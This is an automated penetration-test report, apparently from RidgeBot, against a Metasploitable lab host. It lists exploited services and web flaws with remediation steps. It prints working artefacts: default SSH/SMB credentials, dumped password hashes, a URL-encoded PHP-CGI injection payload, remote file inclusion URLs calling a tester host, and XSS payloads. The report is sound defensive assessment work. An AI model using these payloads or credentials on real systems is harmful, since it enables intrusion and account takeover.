Audit report generated by RidgeBot
Jul 28, 2020 at 11:00
Total number of targets: 2
Task Name | Start Time | End Time | Total Time | Status |
---|---|---|---|---|
Meta Pen-test | Jul 27, 2020 at 17:26 | Jul 28, 2020 at 11:00 | 17.0 hours and 34.0 minutes | Success |
In this task, we have tested 1 IPs and 1 web servers, the Total Health Score of the target system is 6, this score is based on 100 scale.It is a comprehensive evaluation based on multiple factors such as percentage of vulnerability, attack surface, encrypted traffic etc. This test system is considered as in a "risky" condition with the score of 6.The vulnerability found on each asset can be found in "Asset Detail".
RidgeBot successfully performed 11 exploits. These 11 exploited risks are critical and require immediate attention. It means a real hacker can easily achieve the same result. In the "Exploit Details", we provided information on how RidgeBot attacked - path, techniques and actions etc for security team to replicate and fix the issue.
Among 11 exploits, 82% "Credentials" was compromised; 18 "shell" access was gained
Exploited
11
Vulnerability
High
365
Low
15
Medium
114
Total number of targets: | 2 |
Number of active assets: | 1 |
Number of active Domains: | 1 |
Number of attack surface(s): | 820 |
In addition, RidgeBot found 365 high vulnerabilities, 114 medium and 15 low vulnerabilities. These vulnerabilities are possible risks, it might be exploitable, however it may take bigger risk or larger efforts for a hacker. It shall be attended to achieve a comprehensive defense system. Please refer to the "Vulnerability Details" for more information and remediation suggestion.
System Template | Customized Template | Plugins Selected | Scan Type | Scraping Mode | Attack Mode |
---|---|---|---|---|---|
Full Scan | N/A | 59728 | Host and Web | Crawling | Targeted |
Plugin Type | OS Type | Severity | Risk |
---|---|---|---|
|
|
|
|
IP | OS Type | EXPLOITED | HIGH | MEDIUM | LOW |
---|---|---|---|---|---|
192.168.105.200 | 11 | 11 | 12 | 2 |
Domain | IP | EXPLOITED | HIGH | MEDIUM | LOW |
---|---|---|---|---|---|
http://192.168.105.200 | 0 | 354 | 102 | 13 |
SSH weak password is easy to be violently cracked, and weak password users exist. The control rights of the system can be obtained through the weak password landing system.
Node(s) | Additional Information |
---|---|
192.168.105.200:22 |
Account: msfadmin Password: msfadmin |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Only specified IP login is allowed
SSH weak password is easy to be violently cracked, and weak password users exist. The control rights of the system can be obtained through the weak password landing system.
Node(s) | Additional Information |
---|---|
192.168.105.200:22 |
System Info: linux Host Name: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Only specified IP login is allowed
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Node(s) | Additional Information |
---|---|
192.168.105.200:21 |
Account: service Password: $1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu// |
192.168.105.200:21 |
Account: klog Password: $1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0 |
192.168.105.200:21 |
Account: sys Password: $1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0 |
192.168.105.200:21 |
Account: user Password: $1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0 |
192.168.105.200:21 |
Account: msfadmin Password: $1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/ |
192.168.105.200:21 |
Account: postgres Password: $1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/ |
192.168.105.200:21 |
Account: root Password: $1$Mg433GgT$OSXrv7RuOesy5vKAZw7BE/ |
# | Reference |
---|---|
1 | http://pastebin.com/AetT9sS5 |
2 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |
None
As a file sharing service, SMB can access all shared files if it is accessed by unauthorized users. It can also be used in combination with MS17-010 vulnerabilities.
Node(s) | Additional Information |
---|---|
192.168.105.200:445 |
Account: msfadmin Password: msfadmin |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Only specified IP login is allowed
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Node(s) | Additional Information |
---|---|
192.168.105.200:21 |
System Info: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Host Name: metasploitable |
# | Reference |
---|---|
1 | http://pastebin.com/AetT9sS5 |
2 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |
None
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
CVE: [*]
CVSS Score: 10.0
Node(s) | Additional Information |
---|---|
192.168.105.200:21 | Target 192.168.105.200:21 has VSFTPD v2.3.4 Backdoor Command Execution |
# | Reference |
---|---|
1 | http://pastebin.com/AetT9sS5 |
2 | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html |
None
A backdoor is installed on the remote hostAttackers can exploit this issue to execute arbitrary commands in thecontext of the application. Successful attacks will compromise theaffected isystem.
CVE: [*]
CVSS Score: 10.0
Node(s) | Additional Information |
---|---|
192.168.105.200:1524 | Target: IP: 192.168.105.200 Port: 1524,A backdoor is installed on the remote hostAttackers can exploit this issue to execute arbitrary commands in thecontext of the application. Successful attacks will compromise theaffected isystem. |
# | Reference |
---|---|
N/A |
OS End Of Life Detection The Operating System on the remote host has reached the end of life and should not be used anymore
CVE: [*]
CVSS Score: 10.0
Node(s) | Additional Information |
---|---|
192.168.105.200 | Target: IP 192.168.105.200 ,OS End Of Life Detection The Operating System on the remote host has reached the end of life and should not be used anymore |
# | Reference |
---|---|
N/A |
Multiple Java products that implement the RMI Server contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system with elevated privileges.
CVE: [*]
CVSS Score: 10.0
Node(s) | Additional Information |
---|---|
192.168.105.200:1099 | Target: IP: 192.168.105.200 Port: 1099, Multiple Java products that implement the RMI Server contain a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system with elevated privileges. |
# | Reference |
---|---|
1 | :https://tools.cisco.com/security/center/viewAlert.x?alertId=23665 |
Disable class-loading.
SSH weak password is easy to be violently cracked, and weak password users exist. The control rights of the system can be obtained through the weak password landing system.
CVE: [*]
CVSS Score: 9.8
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Target: 192.168.105.200:22, SSH service has weak password vulnerability: User name: root password: root |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Only specified IP login is allowed
As a file sharing service, SMB can access all shared files if it is accessed by unauthorized users. It can also be used in combination with MS17-010 vulnerabilities.
CVE: [*]
CVSS Score: 9.8
Node(s) | Additional Information |
---|---|
192.168.105.200:445 | Target: 192.168.105.200:445, SMB (Shared File Service) has a weak password vulnerability: User name: msfadmin password: msfadmin |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Testing_for_Weak_password_policy_(OTG-AUTHN-007) |
1. Increase password complexity. 2. Only specified IP login is allowed
NFS(Network File System )is one of the file systems supported by FreeBSD,It allows computers in a network to share resources over a TCP / IP network,Client applications of local NFS can read and write files on remote NFS servers transparently, just like accessing local files
CVE: [*]
CVSS Score: 9.8
Node(s) | Additional Information |
---|---|
192.168.105.200:2049 | Target:192.168.105.200 has NFS configaration cause infomation vulnerability |
# | Reference |
---|---|
N/A |
Modify the NFS configuration /etc/exports file to specify that you can view the IP or network segment of the shared file。
Try to log in with given passwords via VNC protocol.
CVE: [*]
CVSS Score: 9.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5900 | Target: IP: 192.168.105.200 Port: 5900,Try to log in with given passwords via VNC protocol. |
# | Reference |
---|---|
N/A |
Change the password to something hard to guess.
Some websites often need to provide file viewing or downloading functions because of business needs.However, if there is no restriction on the files that users can view or download, malicious users can view or download any sensitive files.This is the file viewing and downloading vulnerability * the function that exists to read files * the path of reading files is user-controllable and not checked or rigorously checked. * Output File Content Download Server Arbitrary Files, such as script code, services and system configuration files, etc.Available code for further code auditing to get more exploitable vulnerabilities
CVE: [*]
CVSS Score: 8.6
Node(s) | Additional Information |
---|---|
http://192.168.105.200/mutillidae/?page=add-to-your-blog.php | Target http://192.168.105.200/mutillidae/?page=add-to-your-blog.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php | Target http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php | Target http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?page=home.php | Target http://192.168.105.200/mutillidae/index.php?page=home.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php | Target http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/?page=show-log.php | Target http://192.168.105.200/mutillidae/?page=show-log.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/?page=text-file-viewer.php | Target http://192.168.105.200/mutillidae/?page=text-file-viewer.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target http://192.168.105.200/mutillidae/index.php?page=captured-data.php has an arbitrary file read vulnerability |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous has an arbitrary file read vulnerability |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/PHP_File_Inclusion |
2 | https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion |
3 | https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion |
Strictly control the input parameters of users, and filter the response of functions affected by parameters
When vulnerable PHP runs web services in CGI mode, web server can accept querystring as a parameter of php-cgi running
CVE: [*]
CVSS Score: 8.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200 | Target: http://192.168.105.200 has PHP-CGI remote code execution (CVE-2012-1823). |
# | Reference |
---|---|
1 | https://nvd.nist.gov/vuln/detail/CVE-2012-1823 |
1. Upgrade PHP version to the latest
Many PHP installation tutorials instruct the user to create a file called phpinfo.php or similar containing the phpinfo() statement. Such a file is often times left in webserver directory after completion. Some of the information that can be gathered from this file includes: The username of the user who installed php, if they are a SUDO user, the IP address of the host, the web server version, the system version(unix / linux), and the root directory of the web server.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
http://192.168.105.200/phpinfo.php | Target: http://192.168.105.200/phpinfo.php,Many PHP installation tutorials instruct the user to create a file called phpinfo.php or similar containing the phpinfo() statement. Such a file is often times left in webserver directory after completion. Some of the information that can be gathered from this file includes: The username of the user who installed php, if they are a SUDO user, the IP address of the host, the web server version, the system version(unix / linux), and the root directory of the web server. |
http://192.168.105.200/mutillidae/phpinfo.php | Target: http://192.168.105.200/mutillidae/phpinfo.php,Many PHP installation tutorials instruct the user to create a file called phpinfo.php or similar containing the phpinfo() statement. Such a file is often times left in webserver directory after completion. Some of the information that can be gathered from this file includes: The username of the user who installed php, if they are a SUDO user, the IP address of the host, the web server version, the system version(unix / linux), and the root directory of the web server. |
# | Reference |
---|---|
N/A |
Delete them or restrict access to the listened files.
PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
http://192.168.105.200/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E | Target: http://192.168.105.200/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E,PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible. |
# | Reference |
---|---|
1 | :http://www.h-online.com/open/news/item/Critical-open-hole-in-PHP-creates-risks-Update-1567532.html, |
2 | :http://www.kb.cert.org/vuls/id/520827, |
3 | :http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/, |
4 | :https://bugs.php.net/bug.php?id=61910, |
5 | :http://www.php.net/manual/en/security.cgi-bin.php, |
6 | :http://www.securityfocus.com/bid/53388 |
PHP has released version 5.4.3 and 5.3.13 to address this vulnerability. PHP is recommending that users upgrade to the latest version of PHP.
vsftpd is prone to a backdoor vulnerability. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
192.168.105.200:21 | Target: IP: 192.168.105.200 Port: 21,vsftpd is prone to a backdoor vulnerability. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application. |
192.168.105.200:6200 | Target: IP: 192.168.105.200 Port: 6200,vsftpd is prone to a backdoor vulnerability. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application. Attackers can exploit this issue to execute arbitrary commands in the context of the application. Successful attacks will compromise the affected application. |
# | Reference |
---|---|
1 | :http://www.securityfocus.com/bid/48539, |
2 | :http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html, |
3 | :https://security.appspot.com/vsftpd.html, |
4 | :http://vsftpd.beasts.org/ |
The repaired package can be downloaded from https://security.appspot.com/vsftpd.html. Please validate the package with its signature.
A program developer usually writes the reused function to a single file. It needs to call the file directly when using a function, and does not need to write it again. The process of calling files is generally referred to as file inclusion. Program developers generally want more flexible code, so they set the included files as variables for dynamic invocation, but because of this flexibility, the client can call a malicious file, resulting in file inclusion vulnerabilities. Almost all scripting languages provide the function of file inclusion, but File Inclusion vulnerabilities are mostly found in PHP Web Application, but very few in JSP, ASP, ASP. NET programs, or even none. This is the drawback of some language design.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
http://192.168.105.200/mutillidae/?page=show-log.php | Target: http://192.168.105.200/mutillidae/?page=show-log.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.jpg. |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target: http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php | Target: http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/?page=text-file-viewer.php | Target: http://192.168.105.200/mutillidae/?page=text-file-viewer.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.jpg. |
http://192.168.105.200/mutillidae/index.php?page=home.php | Target: http://192.168.105.200/mutillidae/index.php?page=home.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php | Target: http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/?page=add-to-your-blog.php | Target: http://192.168.105.200/mutillidae/?page=add-to-your-blog.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.jpg. |
http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php | Target: http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target: http://192.168.105.200/mutillidae/index.php?page=captured-data.php parameter page has a file inclusion vulnerability, payload:http://192.168.108.250:40001/vackbot_file_include_test%3F.php. |
# | Reference |
---|---|
N/A |
1. Strict control of user input parameters and response filtering for functions affected by parameters
Misconfigured web servers allows remote clients to perform dangerous HTTP methods such as PUT and DELETE. This script checks if they are enabled and can be misused to upload or delete files. - Enabled PUT method: This might allow an attacker to upload and run arbitrary code on this web server. - Enabled DELETE method: This might allow an attacker to delete additional files on this web server.
CVE: [*]
CVSS Score: 7.5
Node(s) | Additional Information |
---|---|
192.168.105.200:80 | Target: IP: 192.168.105.200 Port: 80,Misconfigured web servers allows remote clients to perform dangerous HTTP methods such as PUT and DELETE. This script checks if they are enabled and can be misused to upload or delete files. - Enabled PUT method: This might allow an attacker to upload and run arbitrary code on this web server. - Enabled DELETE method: This might allow an attacker to delete additional files on this web server. |
# | Reference |
---|---|
N/A |
Use access restrictions to these dangerous HTTP methods or disable them completely.
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.Cross site scripting (also referred to as XSS) is a vulnerability that allowsan attacker to send malicious code (usually in the form of Javascript) to another user.Because a browser cannot know if the script should be trusted or not, it will execute thescript in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
CVE: [*]
CVSS Score: 5.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/YouAreHereswsMZQFRDgCN?template=oopsmore¶m1=1.6¶m2=1.6 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='TtSL(6019)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebSearch?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='egoY(6294)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOURL?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='GKmg(5667)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore¶m1=1.10¶m2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?template=oopsmore¶m1=1.10¶m2=1.10 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='TkHx(4037)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/success?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='IMdT(3879)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiMission?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiMission?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='BJav(5230)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefn?topicparent=TWiki.WebPreferences | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefn?topicparent=TWiki.WebPreferences has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Lgda(7004)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFE?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='fKLO(6123)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/PeterThoeny?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ainf(6671)'bad=" |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php | Target: http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='pOeh(1770)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php | Target: http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='BBtb(1220)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplate?topicparent=TWiki.WebPreferences | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplate?topicparent=TWiki.WebPreferences has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Wogk(2158)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore¶m1=1.34¶m2=1.34 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiAccessControl?template=oopsmore¶m1=1.34¶m2=1.34 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='yvZt(2061)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?t=1595894751&topicparent=5109287037480 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?t=1595894751&topicparent=5109287037480 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='rFEP(2245)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/FileAttribute?topicparent=TWiki.WebHome | Target: http://192.168.105.200/twiki/bin/edit/TWiki/FileAttribute?topicparent=TWiki.WebHome has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='uAbw(7789)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiGroups?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='NjOP(5062)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?topicparent=TWiki.WebRssgFJiGmbjzLvK | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?topicparent=TWiki.WebRssgFJiGmbjzLvK has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='cODd(1579)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore¶m1=1.18¶m2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU?template=oopsmore¶m1=1.18¶m2=1.18 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='Yqgf(1667)'bad=" |
http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.7¶m2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/Sandbox/WebHome?template=oopsmore¶m1=1.7¶m2=1.7 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ChnX(7517)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?t=1595894863&topicparent=4912653023915 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?t=1595894863&topicparent=4912653023915 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='TqtL(3330)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/TWikiGuest?topicparent=TWiki.WikiName | Target: http://192.168.105.200/twiki/bin/edit/Main/TWikiGuest?topicparent=TWiki.WikiName has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='uNci(6867)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle?topicparent=TWiki.GoodStyle | Target: http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle?topicparent=TWiki.GoodStyle has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='oPbY(7559)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.120¶m2=1.120 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.120¶m2=1.120 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='qyDI(7224)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore¶m1=1.18¶m2=1.18 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicList?template=oopsmore¶m1=1.18¶m2=1.18 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='VQVr(3209)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target: http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='OOgv(3267)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/BillClinton?topicparent=TWiki.WikiName | Target: http://192.168.105.200/twiki/bin/edit/TWiki/BillClinton?topicparent=TWiki.WikiName has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Uktp(1520)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:<ScRiPt >rdLY(8587)</ScRiPt> |
